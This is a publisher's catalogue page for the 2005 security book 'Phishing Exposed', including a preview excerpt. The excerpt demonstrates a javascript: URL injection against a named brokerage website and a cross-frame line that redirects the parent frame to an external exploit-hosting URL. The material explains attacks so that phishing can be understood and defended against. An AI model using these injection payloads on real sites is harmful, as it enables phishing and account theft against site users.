Skip to Main Content
Phishing Exposed
book

Phishing Exposed

by Lance James, Dave Jevans
November 2005
Intermediate to advanced content levelIntermediate to advanced
450 pages
11h 24m
English
Syngress
Content preview from Phishing Exposed
D. Waterhouse. But a problem like that only makes us want to investigate further.
Remembering that javascript: is considered a registered protocol by browsers, let’s
try this (see Figure 5.14):
www.tdwaterhouse.com/research/wsod.asp?javascript:alert("test")
Figure 5.14 Registered Protocol Works!
From an attacker’s perspective, this is very good news. We can combine our
cross-frame trick since we have access to the content frame, and with the
javascript: access, we can easily control the parent frame as well.The code to do
this is where the DOM element interfacing applies:
parent.frames[0].location=
"http://ip.securescience.net/exploits/tdwaterhouse/webbroker1.tdwaterhouse.c ...
Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
and much more.
Start your free trial

You might also like

A Machine-Learning Approach to Phishing Detection and Defense

A Machine-Learning Approach to Phishing Detection and Defense

O.A. Akanbi, Iraj Sadegh Amiri, E. Fazeldehkordi
Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails

Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails

Robin Dreeke, Michele Fincher, Christopher Hadnagy
Ransomware

Ransomware

Allan Liska, Timothy Gallo

Publisher Resources

ISBN: 9781597490306